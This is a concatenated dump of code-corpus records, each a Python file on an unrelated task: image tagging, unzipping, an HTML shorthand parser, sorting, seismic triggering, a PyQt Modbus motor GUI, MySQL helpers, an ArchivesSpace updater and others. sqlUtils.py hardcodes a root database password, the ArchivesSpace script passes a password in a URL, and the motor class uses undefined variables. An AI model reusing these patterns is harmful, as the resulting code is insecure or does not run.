tag_images(count_imgs_users, count_imgs_total_label, count_imgs_label_num)\n\tfor data in result:\n\t\tr = R_Img_Label.query.filter_by(img_id=data[0]).filter_by(label_id=data[1]).first()\n\t\tr.confidence = data[2]\n\t\tdb.session.commit()\n\tnum_user = count_users\n\tnum_labels = 5\n\tfor id in img_ids:\n\t\tif(count_imgs_users[str(id)] >= num_user):\n\t\t\trs = R_Img_Label.query.filter_by(img_id=id).\\\n\t\t\t\torder_by(R_Img_Label.confidence.desc()).limit(num_labels)\n\t\t\tfor r in rs:\n\t\t\t\tr.accepted=True\n\tdb.session.commit()","sub_path":"app/img/tag_image.py","file_name":"tag_image.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"399843836","text":"import os\nimport zipfile\n\nfor root, dirs, files in os.walk('/home/prajwaljpj/Downloads/gnani.ai/database'):\n for each in files: \n if each.endswith(\".zip\"):\n print(root, dirs, each)\n zip_ref = zipfile.ZipFile(root+'/'+each, 'r')\n zip_ref.extractall(root)\n zip_ref.close()\n","sub_path":"unzip.py","file_name":"unzip.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250392174","text":"# ------------------------------------------------------------------------------\n# Functions for processing shorthand html tags.\n# ------------------------------------------------------------------------------\n\nimport html\nimport re\n\nfrom . import nodes\nfrom . import parsers\nfrom . import utils\n\n\n\n# Void elements have no content or closing tag.\nhtml_void_tags = \"\"\"\n area base br col embed hr img input link meta param source track wbr\n\"\"\".split()\n\n\n# Leaf elements cannot contain nested block-level content.\nhtml_leaf_tags = \"\"\"\n dt h1 h2 h3 h4 h5 h6 p title\n a abbr acronyn audio b bdi bdo big button canvas cite code data datalist\n del dfn em i iframe ins kbd label map mark meter noscript \n object output picture progress q ruby s samp select slot small span \n strong sub sup svg template textarea time u tt var video \n\"\"\".split()\n\n\n# Raw elements contain text which should be included in the output as-is.\nhtml_raw_tags = \"script style\".split()\n\n\n# Process a tagged block.\ndef process(header, content, meta):\n match = re.fullmatch(r':([^ ]+)([ ].+)?', header)\n tag = match.group(1)\n argstring = match.group(2) or ''\n pargs, kwargs = utils.ArgParser().parse(argstring)\n\n if tag == 'pre':\n text = html.escape(str(content))\n node = nodes.Node('pre', kwargs, text=text)\n elif tag == 'a':\n node = nodes.Node('a', kwargs)\n node.children = parsers.InlineParser().parse(content, meta)\n if pargs:\n node.attributes['href'] = pargs[0]\n elif tag == 'img':\n node = nodes.Node('img', kwargs, is_void=True)\n if not 'src' in kwargs:\n node.attributes['src'] = pargs[0] if pargs else ''\n if not 'alt' in kwargs:\n node.attributes['alt'] = html.escape(str(content).replace('\\n', ' '))\n elif tag in html_void_tags:\n node = nodes.Node(tag, kwargs, is_void=True)\n elif tag in html_leaf_tags:\n node = nodes.Node(tag, kwargs)\n node.children = parsers.InlineParser().parse(content, meta)\n elif tag in html_raw_tags:\n node = nodes.Node(tag, kwargs, text=str(content))\n else:\n node = nodes.Node(tag, kwargs)\n node.children = parsers.BlockParser().parse(content, meta)\n\n if 'nl2lb' in pargs or 'nl2br' in pargs:\n node = nodes.LinebreakNode().append_child(node)\n return node\n\n","sub_path":"syntext/shorthand.py","file_name":"shorthand.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"553287225","text":"\n\nfrom xai.brain.wordbase.adjectives._dirty import _DIRTY\n\n#calss header\nclass _DIRTYING(_DIRTY, ):\n\tdef __init__(self,): \n\t\t_DIRTY.__init__(self)\n\t\tself.name = \"DIRTYING\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"dirty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_dirtying.py","file_name":"_dirtying.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"571872948","text":"\"\"\"\n给定一个有n个对象(包括k种不同的颜色,并按照1到k进行编号)的数组,将对象进行分类使相同颜色的对象相邻,并按照1,2,...k的顺序进行排序。\n\n样例\n给出colors=[3, 2, 2, 1, 4],k=4, 你的代码应该在原地操作使得数组变成[1, 2, 2, 3, 4]\n\n挑战\n一个相当直接的解决方案是使用计数排序扫描2遍的算法。这样你会花费O(k)的额外空间。你否能在不使用额外空间的情况下完成?\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param colors: A list of integer\n @param k: An integer\n @return: nothing\n \"\"\"\n # 这道题k好像没用到,直接套用快排模板就行了\n # time:764ms\n def sortColors2(self, colors, k):\n # write your code here\n\n self.quick_sort(colors, 0, len(colors) - 1)\n\n def quick_sort(self, Array, left, right):\n if left >= right:\n return\n low, high = left, right\n key = Array[low]\n while left < right:\n while left < right and Array[right] > key:\n right -= 1\n Array[left] = Array[right]\n while left < right and Array[left] <= key:\n left += 1\n Array[right] = Array[left]\n Array[right] = key\n self.quick_sort(Array, low, left - 1)\n self.quick_sort(Array, left + 1, high)","sub_path":"算法 - 排序/排序/143.排颜色 II.py","file_name":"143.排颜色 II.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"495713258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script will run the trigger stage of QuakeMigrate.\n\n\"\"\"\n\n# Import required modules\nimport QMigrate.signal.trigger as qtrigger\nimport QMigrate.io.quakeio as qio\n\n# Set i/o paths\nstation_file = \"/path/to/station_file\"\nout_path = \"/path/to/output\"\nrun_name = \"name_of_run\"\n\n# Time period over which to run trigger\nstart_time = \"2018-001T00:00:00.0\"\nend_time = \"2018-002T00:00:00.00\"\n\n# Read in station files\nstations = qio.stations(station_file)\n\n# Create a new instance of Trigger\ntrig = qtrigger.Trigger(out_path, run_name, stations)\n\n# Set trigger parameters - for a complete list and guidance on how to choose\n# a suitable set of parameters, please consult the documentation\ntrig.normalise_coalescence = True\ntrig.marginal_window = 1.\ntrig.minimum_repeat = 30.\ntrig.detection_threshold = 1.75\n\n# Run trigger\ntrig.trigger(start_time, end_time, savefig=False)\n","sub_path":"example_running_scripts/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"521108959","text":"import sys\nfrom panel import Ui_MainWindow\nfrom PyQt5 import QtWidgets,QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom PyQt5.QtCore import Qt\nfrom pyqt_led.pyqt_led import Led # From https://github.com/Neur1n/pyqt_led\n\nimport serial\nimport modbus_tk\nimport modbus_tk.defines as cst\nfrom modbus_tk import modbus_rtu\nimport time\n\nimport os\nimport yaml\n\nclass switch:\n def __init__(self, addr, port, master): # 站号, 地址, 主线程中modbus设备的实例\n self.addr = addr\n self.port = port\n self.master = master\n self.state = -1\n print(\"Init switch at {0} {1}\".format(addr,port))\n def check_on(self):\n self.state = self.master.execute(self.addr, cst.READ_DISCRETE_INPUTS, self.port-1, 1)[0]\n return self.state\n\nclass motor:\n def __init__(self, addr, bridge, master): # 站号, 四个继电器的地址\n self.addr = addr\n self.bridge = bridge\n self.master = master\n (h1,h2,l1,l2) = bridge\n print(\"Init motor at {0} {1}\".format(addr, bridge))\n def stop(self):\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h1-1, output_value=0)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h2-1, output_value=0)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, l1-1, output_value=0)\n res = self.master.execute(io_port, cst.WRITE_SINGLE_COIL, l2-1, output_value=0)\n pass\n def forward(self):\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h1-1, output_value=1)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h2-1, output_value=0)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, l1-1, output_value=0)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, l2-1, output_value=1)\n pass\n def reverse(self):\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h1-1, output_value=0)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, h2-1, output_value=1)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, l1-1, output_value=1)\n res = self.master.execute(addr, cst.WRITE_SINGLE_COIL, l2-1, output_value=0)\n pass\n\nclass entranceThread(QThread):\n updated = pyqtSignal(str)\n start_work = pyqtSignal(bool)\n def __init__(self):\n super(entranceThread, self).__init__()\n self.ser = None\n self.run_flag = False\n def setser(self, ser):\n self.ser = ser\n self.run_flag = True\n self.start()\n def threadStop(self):\n self.run_flag = False\n def run(self):\n print(\"Start Reading Entrance\")\n self.run_flag = True\n while self.run_flag:\n try:\n if self.ser.in_waiting:\n read_str=self.ser.read(self.ser.in_waiting )\n # read_str=self.ser.read(self.ser.in_waiting ).hex()\n self.updated.emit(str(\"[Read ] {}\".format(read_str)))\n if str(read_str,'utf-8').split(\"'\")[0] == \"ABCD\":\n self.start_work.emit(bool(True))\n time.sleep(0.1) # CPU占用过高\n except Exception as e:\n print(str(e))\n\nclass workThread(QThread):\n updated = pyqtSignal(str)\n def __init__(self):\n super(workThread, self).__init__()\n self.motor_1 = None\n self.switch_1 = None\n\n def setdevice(self, motor_1, switch_1):\n self.motor_1 = motor_1\n self.switch_1 = switch_1\n self.start()\n\n def run(self):\n print(\"Start Working thread\")\n # while True:\n # print(self.switch_1.check_on())\n self.updated.emit(str(\"[Read ] switch at {0}, state = {1}\".format(self.switch_1.port, self.switch_1.check_on())))\n print(\"Working thread died\")\n\n \n\nclass MyWindow(QtWidgets.QMainWindow,Ui_MainWindow):\n \"\"\"\n init:\n set UI\n set led\n set self.serial_flag\n add serial_port item\n set logger\n set io_read/write_from,io_read/write_to \n \"\"\"\n def __init__(self):\n # set UI\n super(MyWindow,self).__init__() # 菱形继承\n self.setupUi(self)\n self.led_widget._layout = QtWidgets.QGridLayout(self.led_widget)\n self._create_leds()\n self._arrange_leds()\n for i in range (1,21):\n exec('self.serial_port.addItem(\"/dev/ttyS{0}\")'.format(i))\n for i in range (1,21):\n exec('self.modbus_port.addItem(\"/dev/ttyS{0}\")'.format(i))\n self.logger = modbus_tk.utils.create_logger(\"console\")\n self.serial_flag = False\n\n #call after serial&master init\n def init_hardware(self):\n fileNamePath = os.path.split(os.path.realpath(__file__))[0]\n yamlPath = os.path.join(fileNamePath,'./config.yaml')\n config = None\n try:\n with open(yamlPath,'r',encoding='utf-8') as f:\n result = f.read()\n config = yaml.load(result,Loader=yaml.FullLoader)\n # init motor\n self.motor_1 = motor(config['digital_device']['addr'],tuple(config['digital_device']['output']['d01']), self.master)\n # init switches\n self.switch_1 = switch(config['digital_device']['addr'],config['digital_device']['input']['td01'], self.master)\n except Exception as e:\n self.serial_message.append(\"Read config at {} failed\".format(yamlPath))\n print(x['digital_device']['addr'])\n\n \"\"\"\n onclick:serial_connect\n input:\n self.serial_port.currentText()\n self.baud_rate.currentText()\n self.data_bit.currentText()\n self.parity.currentText()\n self.stop_bit.currentText()\n output:\n self.ser\n self.master\n self.serial_message\n self.serial_flag\n \"\"\"\n def serial_connect(self):\n if not self.serial_flag:\n serial_port = self.serial_port.currentText()\n modbus_port = self.modbus_port.currentText()\n baud_rate = self.baud_rate.currentText()\n data_bit = int(self.data_bit.currentText())\n parity = self.parity.currentText()\n stop_bit = int(self.stop_bit.currentText())\n try:\n # 门禁串口\n self.ser=serial.Serial(port=serial_port,baudrate=baud_rate,bytesize=data_bit,parity=parity,stopbits=stop_bit)\n # 485设备串口\n self.mod=serial.Serial(port=modbus_port,baudrate=baud_rate,bytesize=data_bit,parity=parity,stopbits=stop_bit)\n # modbus对象\n self.master = modbus_rtu.RtuMaster(self.mod)\n self.master.set_timeout(0.5)\n self.master.set_verbose(True)\n self.logger.info(\"connected\")\n if self.ser.isOpen():\n self._serial_state(\"connected\")\n self.serial_message.append(\"[State] Seral connected\")\n self.serial_flag = True\n self.init_hardware()\n # Start entrance thread\n self.entranceThread = entranceThread()\n self.entranceThread.setser(self.ser)\n self.entranceThread.updated.connect(self._thread_append)\n self.entranceThread.start_work.connect(self._workthread)\n except Exception as e:\n self.serial_message.append(\"Open {0} failed, make sure you open the device\".format(serial_port))\n self._serial_state(\"failed\")\n else:\n self.serial_message.append(\"[State] Serial already connected\")\n\n def serial_disconnect(self):\n try:\n self.ser.flush()\n if self.ser.isOpen():\n self.entranceThread.threadStop()\n self.entranceThread.quit()\n self.entranceThread = None\n\n self.master.close()\n self.ser.close()\n self._serial_state(\"wait\")\n self.serial_message.append(\"[State] Serial disconnected\")\n else:\n self._serial_state(\"failed\")\n self.serial_message.append(\"[State] Serial can not connected\")\n self.serial_flag = self.ser.isOpen()\n except Exception as e:\n self.serial_message.append(\"[State] Close serial connect failed\")\n self._serial_state(\"wait\")\n\n def _serial_state(self,state):\n if state == 'failed':\n self.waitinglabel.setStyleSheet(\"color:red;font-weight:bold\")\n self.waitinglabel.setText(\"Failed\")\n if state == 'wait':\n self.waitinglabel.setStyleSheet(\"color:black;font-weight:bold\")\n self.waitinglabel.setText(\"Not Connected\")\n if state == 'connected':\n self.waitinglabel.setStyleSheet(\"color:green;font-weight:bold\")\n self.waitinglabel.setText(\"Connected\")\n else:\n pass\n\n def clean_log(self):\n self.serial_message.clear()\n pass\n\n def _create_leds(self):\n for i in range (0,16):\n exec('self.led_widget.led_input{0} = Led(self.led_widget, on_color=Led.red, shape=Led.circle, build=\"debug\")'.format(i))\n for i in range (0,16):\n exec('self.led_widget.led_output{0} = Led(self.led_widget, on_color=Led.red, shape=Led.circle, build=\"debug\")'.format(i))\n \n def _arrange_leds(self):\n for i in range (0,16):\n exec('self.led_widget._layout.addWidget(self.led_widget.led_input{0},0,{0}, 1, 1, QtCore.Qt.AlignCenter)'.format(i))\n for i in range (0,16):\n exec('self.led_widget._layout.addWidget(self.led_widget.led_output{0},1,{0}, 1, 1, QtCore.Qt.AlignCenter)'.format(i))\n\n def _thread_append(self, text):\n self.serial_message.append(text)\n\n def _workthread(self, flag):\n if flag == True:\n self.workThread = workThread()\n self.workThread.setdevice(self.motor_1,self.switch_1)\n self.workThread.updated.connect(self._thread_append)\n pass\n\nif __name__ == \"__main__\":\n QtWidgets.QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n app=QtWidgets.QApplication(sys.argv)\n myshow=MyWindow()\n myshow.show()\n sys.exit(app.exec())","sub_path":"thread-demo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477734669","text":"import mysql.connector\nfrom mysql.connector import Error\nfrom time import sleep\n\ncnx = mysql.connector.connect(host='localhost', database='sqa', user='root', password='database!')\n\n\ndef getLastUser():\n cursor = cnx.cursor()\n\n query = \"SELECT u.full_name, u.date_of_birth, u.address, u.email, c.name, m.name_major \\\n FROM user AS u, major AS m, course AS c \\\n WHERE u.course_id = c.id \\\n AND u.major_id = m.id \\\n ORDER BY u.id DESC LIMIT 1;\"\n\n cursor.execute(query)\n user = cursor.fetchone()\n user = list(user)\n user[1] = user[1].strftime('%m/%d/%Y')\n return tuple(user)\n\n\ndef getIdLastUser():\n cursor = cnx.cursor()\n\n query = \"SELECT user.id \\\n FROM user \\\n ORDER BY user.id DESC LIMIT 1;\"\n\n cursor.execute(query)\n user = cursor.fetchone()\n return user[0]\n\n\ndef getUserById(idUser):\n cursor = cnx.cursor()\n query = \"SELECT u.full_name, u.date_of_birth, u.address, u.email, c.name, m.name_major \\\n FROM user AS u, major AS m, course AS c \\\n WHERE u.course_id = c.id \\\n AND u.major_id = m.id \\\n AND u.id = %s;\"\n condition = (idUser,)\n cursor.execute(query, condition)\n user = cursor.fetchone()\n if user:\n user = list(user)\n user[1] = user[1].strftime('%m/%d/%Y')\n else:\n user = []\n return tuple(user)\n\n\ndef getUserByIdForDel(idUser):\n cursor = cnx.cursor()\n query = \"SELECT user.code, user.status \\\n FROM user \\\n WHERE user.id = %s\"\n condition = (idUser,)\n cursor.execute(query, condition)\n data = cursor.fetchone()\n user = {\n 'code': data[0],\n 'status': data[1]\n }\n return user\n\n\ndef deleteLastUser():\n cursor = cnx.cursor()\n query = \"DELETE FROM user ORDER BY id DESC LIMIT 1\"\n cursor.execute(query)\n cnx.commit()\n return True\n","sub_path":"src/test/java/com/vaigay/WebSpringBoot/selenium/sqlUtils.py","file_name":"sqlUtils.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"98646024","text":"class Solution:\n # @return an integer\n def romanToInt(self, s):\n if len(s) == 0:\n return 0\n num_map = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n prev = num_map[s[0]]\n res = prev\n for i in range(1, len(s)):\n cur = num_map[s[i]]\n if cur > prev:\n res += cur - 2 * prev\n else:\n res += cur\n prev = cur\n return res\n \n","sub_path":"src/main/python/lc/roman_to_int.py","file_name":"roman_to_int.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211153805","text":"\"\"\"Support for atomic but \"in a parallel transaction\" operations\"\"\"\n\nfrom peak.api import *\nfrom peak.util.advice import advice\n\n__all__ = [\n 'AutoCommitter', 'Untransactable', 'autocommitted'\n]\n\n\nclass AutoCommitter(storage.TransactionComponent):\n\n \"\"\"TransactionComponent that supports 'autocommit' setting and methods\n\n 'AutoCommitter' instances accept an 'autocommit' keyword argument\n which tells them they have permission to take control of their\n transaction boundaries. Any 'autocommitted' methods of an\n 'AutoCommitter' will automatically be wrapped in a transaction if\n the object has not already joined one.\n\n In addition, if a 'txnSvc' keyword isn't supplied, but 'autocommit'\n is a true value, 'AutoCommitter' objects allocate their own private\n transaction service instance, for use in 'autocommitted' methods.\n This transaction service will be shared with any sub-components of\n the 'AutoCommitter', thus ensuring composability. You will normally\n want your subcomponents, however, to be created with a false or missing\n 'autocommit' setting, so that they simply participate in your\n component's private transaction if appropriate.\n \"\"\"\n\n autocommit = False\n\n def __init__(self,*__args,**__kw):\n\n super(AutoCommitter,self).__init__(self,*__args,**__kw)\n\n if self.autocommit and not self._hasBinding('txnSvc'):\n self.txnSvc = storage.TransactionService(self,'txnSvc')\n\n\n\nclass Untransactable(binding.Component):\n\n \"\"\"Untransactable object that *requires* a true setting for 'autocommit'\n\n Subclass this if you have an object which is not transactional, but\n might be used interchangeably with similar 'AutoCommitter' objects.\n This ensures that an attempt to create an instance of your class\n will raise an exception if a true setting for 'autocommit' isn't\n supplied, thus warning the caller in the event that they mistakenly\n used the wrong implementation for their desired semantics. For\n example, if they used an SMTP messaging class instead of a queue-based\n messaging class, but wanted the message send to wait until transaction\n commit time.\n \"\"\"\n\n def __init__(self,*__args,**__kw):\n\n super(Untransactable,self).__init__(self,*__args,**__kw)\n\n if not self.autocommit:\n raise exceptions.TransactionsNotSupported(\n \"%r does not support transactions; the 'autocommit'\"\n \" flag is required.\" % self\n )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass autocommitted(advice):\n\n \"\"\"meth = autocommited(meth) - Wrap a method with autocommit support\n\n 'AutoCommitter' classes should wrap any methods which want to be\n atomic operations in an 'autocommitted()' advice. For example::\n\n from peak.storage.autocommit import *\n\n class QueuedMessageSender(AutoCommitter):\n\n def send(self,message):\n # ...\n\n send = autocommitted(send)\n\n When a 'QueuedMessageSender' object's 'send()' method is called,\n it will be wrapped in a transaction as long as the object was\n created with a true setting for its 'autocommit' parameter. If\n an error is raised from 'send()', the transaction will be aborted,\n otherwise it will be committed.\n\n If a wrapped method is called from inside another 'autocommitted()'\n method of the same object, or if the object doesn't have 'autocommit'\n set to a true value, no special transaction handling occurs.\n\n Note that errors raised during the wrapping transaction's commit or\n abort method may leave the object's transaction service stuck in a\n failure mode, where it cannot be committed, only aborted. This can\n be fixed by calling the 'theBrokenObject.txnSvc.abort()' until it\n no longer raises an exception. Or, it may be more worthwhile to\n set up a custom error handler on the transaction service instance\n used for autocommit transactions. Once we have enough experience\n with this issue to know what's most useful, we may add such an\n error handler to the 'AutoCommitter' default 'txnSvc' setup code.\n\n Also note that wrapped methods should always use 'self.joinedTxn' to\n ensure they have joined a transaction; this wrapper doesn't do it for\n you. (It can't, since it would then fail to work correctly when\n autocommit is turned off.)\"\"\"\n\n __slots__ = ()\n\n\n def __call__(__advice, self, *__args, **__kw):\n\n if self.autocommit and not self.txnSvc.isActive():\n\n # We only want to do this if a transaction isn't already in\n # progress, *and* the object is in autocommit mode.\n\n self.txnSvc.begin()\n\n try:\n retval = __advice._func(self, *__args, **__kw)\n except:\n self.txnSvc.abort()\n raise\n else:\n self.txnSvc.commit()\n return retval\n\n else:\n # Just call the method\n return __advice._func(self, *__args, **__kw)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/storage/autocommit.py","file_name":"autocommit.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"613226100","text":"#/usr/bin/python3\n#~/anaconda3/bin/python\n\nimport requests, csv, json, time, traceback, logging\n\n#generic thumbnail\n#\"https://libweb.library.yale.edu/pui-assets/access_thumb.jpg\"\n\n#Log in to the ArchivesSpace API\ndef login():\n api_url = input('Please enter the ArchivesSpace API URL: ')\n username = input('Please enter your username: ')\n password = input('Please enter your password: ')\n auth = requests.post(api_url+'/users/'+username+'/login?password='+password).json()\n #if session object is returned then login was successful; if not it failed.\n if 'session' in auth:\n session = auth[\"session\"]\n headers = {'X-ArchivesSpace-Session':session}\n print('Login successful!')\n return (api_url, headers)\n else:\n print('Login failed! Check credentials and try again')\n return\n\n#Open a CSV in reader mode\ndef opencsv():\n input_csv = input('Please enter path to CSV: ')\n file = open(input_csv, 'r', encoding='utf-8')\n csvin = csv.reader(file)\n next(csvin, None)\n return csvin\n\n#Open a text file in writer mode\ndef opentxt():\n filepath = input('Please enter path to output text file: ')\n filename = open(filepath, 'a', encoding='utf-8')\n return filename\n\ndef openjson(directory, filename):\n filepath = open(directory + '/' + filename + '.json', 'w', encoding='utf-8')\n return filepath\n\n#Keeps script runtime\ndef keeptime(start, outfile):\n elapsedtime = time.time() - start\n m, s = divmod(elapsedtime, 60)\n h, m = divmod(m, 60)\n outfile.write('Total time elapsed: ')\n outfile.write('%d:%02d:%02d' % (h, m, s) + '\\n')\n\n\n#add some kind of status update thing so i know it's still going...\ndef create_file_uris():\n starttime = time.time()\n #execute login function, return api url and headers\n values = login()\n #opens the csv containing data to be added to AS\n csvfile = opencsv()\n #opens log file - CHANGE TO LOGGING!!!\n txtfile = opentxt()\n dirpath = input('Please enter path to backup directory: ')\n #First attempt to use enumerate to calculate success did not work, so using this for now\n x = 0\n #using enumerate to calculate total attempts\n for i, row in enumerate(csvfile, 1):\n #retrieve this data from Ladybird or AS database\n record_uri = row[0]\n #for the open with permission this is still in the digital object ID. For the others have it on\n #a csv\n find_it_url = row[1]\n #use the generic thumbnail for the open with permissions, and thumbs from Ladybird for others; some failed. Will\n #need a webscrape report of diffs\n thumbnail_url = row[2]\n #this will eventually be the OID...for now it is the dig coll ID...\n dig_object_id = row[3]\n try:\n #can add more data here depending on needs\n #retrieves digital object JSON for each digital object URI in the input CSV\n record_json = requests.get(values[0] + record_uri, headers=values[1]).json()\n outfile = openjson(dirpath, record_uri[1:].replace('/','_'))\n json.dump(record_json, outfile)\n record_json['publish'] = True\n record_json['digital_object_id'] = dig_object_id\n find_it_file_version = {'file_uri': find_it_url, 'jsonmodel_type': 'file_version', \n 'xlink_show_attribute': 'new', 'publish': True}\n thumbnail_file_version = {'file_uri': thumbnail_url, 'jsonmodel_type': 'file_version', \n 'xlink_show_attribute': 'embed', 'publish': True}\n #record_json['file_versions'].append(thumbnail_file_version)\n record_json['file_versions'].extend([find_it_file_version, thumbnail_file_version])\n record_data = json.dumps(record_json)\n record_update = requests.post(values[0]+ record_uri, headers=values[1], data=record_data).json()\n #print(record_update)\n if 'status' in record_update:\n x += 1\n y = list(range(0, 50000, 100))\n if x in y:\n print(str(x))\n elif 'error' in record_update:\n txtfile.write('error: could not update ' + str(record_uri) + '\\n')\n txtfile.write('log: ' + str(record_update.get('error')) + '\\n')\n print(record_update)\n except Exception as exc:\n print(record_uri)\n print(traceback.format_exc())\n txtfile.write(record_uri + '\\n')\n txtfile.write(str(traceback.format_exc()) + '\\n')\n txtfile.write(str(exc) + '\\n')\n continue\n txtfile.write('Total number of records attempted: ' + str(i) + '\\n')\n txtfile.write('Successful updates: ' + str(x) + '\\n')\n keeptime(starttime, txtfile)\n print('All Done!')\n\n\n","sub_path":"file_versions/create_file_versions.py","file_name":"create_file_versions.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"219447283","text":"\"\"\"\nDocta projects handler.\n\"\"\"\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom future.builtins import super\nimport os\nimport hashlib\nimport docta.chapters\nimport docta.exceptions\nimport docta.render\nimport docta.utils.fs as fs\nimport docta.utils.meta as meta\n\n# Defaults\nOUT_FORMAT_DEFAULT = 'html'\n\n\nclass Project(object):\n \"\"\"\n Project data handler: scans project directories, manages resources,\n creates empty project, builds project.\n \"\"\"\n def __init__(self, path, config=None):\n self.path = path\n self.config = config or {}\n\n def load(self):\n \"\"\"\n Load project structure.\n \"\"\"\n self.tree = []\n\n for chapter_config in self.config.get('chapters', []):\n config = self.config.copy()\n config.update(chapter_config)\n # print(\"Chapter config: %s\" % config)\n\n nav_path = config.get('base_nav_path', '')\n chapter = docta.chapters.load_tree(self.input_dir(config),\n config, nav_path=nav_path)\n self.tree.append(chapter)\n # self.print_tree(self.tree[-1])\n\n def build(self, formats=None):\n \"\"\"\n Build project with specified formats.\n \"\"\"\n self.load()\n\n for out_format in (formats or [OUT_FORMAT_DEFAULT]):\n render_class = docta.render.get_renderer(out_format)\n renderer = render_class(self)\n renderer.render()\n\n def input_dir(self, config=None):\n \"\"\"\n Full input dir path for specified config.\n \"\"\"\n if config is None:\n config = self.config\n return fs.real(fs.join(self.path, config.get('input_path', '.')))\n\n def output_dir(self, out_format=None):\n \"\"\"\n Output directory for specified format.\n \"\"\"\n output = self.config['output'][out_format]\n if isinstance(output, dict):\n output_rel_path = output.get('build_path', out_format)\n else:\n output_rel_path = output\n return fs.path_for_dir(self.path, output_rel_path)\n\n def assets_dir(self, out_format=None):\n \"\"\"\n Output directory for assets and specified format.\n \"\"\"\n output = self.config['output'][out_format]\n if isinstance(output, dict):\n output_rel_path = output.get('assets_path')\n if output_rel_path:\n return fs.path_for_dir(self.path, output_rel_path)\n\n def templates_dir(self):\n \"\"\"\n Jinja templates directory.\n \"\"\"\n return fs.path_for_dir(self.path, self.config.get('templates', '_templates'))\n\n def copy_resources(self, out_format=None):\n \"\"\"\n Copy resources to output directory.\n \"\"\"\n if self.config.get('resources'):\n in_resources = fs.path_for_dir(self.path, self.config['resources'])\n out_resources = self.output_dir(out_format)\n fs.cp(in_resources, out_resources, overwrite=True)\n\n def copy_assets(self, out_format=None):\n \"\"\"\n Copy assets to output directory.\n \"\"\"\n if self.config.get('assets'):\n in_assets = fs.path_for_dir(self.path, self.config['assets'])\n out_assets = self.assets_dir(out_format)\n if out_assets:\n fs.cp(in_assets, out_assets, overwrite=True)\n\n def asset_hash(self, rel_path):\n \"\"\"\n Get asset file checksum.\n \"\"\"\n if self.config.get('assets'):\n assets_dir = fs.path_for_dir(self.path, self.config['assets'])\n path = os.path.join(assets_dir, rel_path)\n return hashlib.md5(open(path, 'rb').read()).hexdigest()\n\n def print_tree(self, root):\n \"\"\"\n DEBUG: print chapters tree\n \"\"\"\n def print_chapter(chapter, level=0):\n print(' '*level, str(chapter))\n for ch in chapter.children:\n print_chapter(ch, level+1)\n print_chapter(root)\n\n","sub_path":"docta/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"226333996","text":"# Returns whether binary tree is binary search tree, in O(n) time and extra space\n\nclass BinTreeNode:\n def __init__(self, val, left=None, right=None):\n self.left, self.right, self.val = left, right, val\n\n def in_order(self):\n if self.left: yield from self.left.in_order()\n\n yield self\n\n if self.right: yield from self.right.in_order()\n\ndef is_bst(bin_tree_node):\n prev_val, val = None, None\n for node in bin_tree_node.in_order():\n val = node.val\n if prev_val is not None and val < prev_val: return False\n prev_val = val\n\n return True\n\nroot = BinTreeNode(8)\nroot.left, root.right = BinTreeNode(4), BinTreeNode(12)\nroot.left.left, root.left.right = BinTreeNode(2), BinTreeNode(6)\nroot.left.right.left = BinTreeNode(4)\nroot.left.right.left.right = BinTreeNode(5)\nroot.right.left, root.right.right = BinTreeNode(9), BinTreeNode(15)\nroot.right.left.right = BinTreeNode(10)\nroot.right.left.right.right = BinTreeNode(11)\n\nprint(is_bst(root) == True)\n\nroot.right.left.right.right.left = BinTreeNode(13)\n\nprint(is_bst(root) == False)\n","sub_path":"py/is_bst.py","file_name":"is_bst.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"7750985","text":"import numpy as np\nimport torch\nimport 